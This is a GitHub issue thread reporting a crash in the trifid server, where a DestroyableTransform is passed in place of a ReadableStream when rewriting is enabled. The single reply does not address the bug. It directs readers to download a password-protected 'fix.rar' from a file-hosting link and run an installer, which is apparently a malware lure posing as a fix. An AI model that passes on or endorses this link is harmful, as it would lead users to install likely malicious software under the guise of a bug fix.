### ISSUE TITLE
Crash in case there is a DestroyableTransform

### ISSUE THREAD

**Issue by ludovicm67** [zazuko/trifid#484]
In case rewriting is enabled, users might see the following error in the console:

> The "readableStream" argument must be an instance of ReadableStream.
> Received an instance of DestroyableTransform.

and a 500 is returned.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
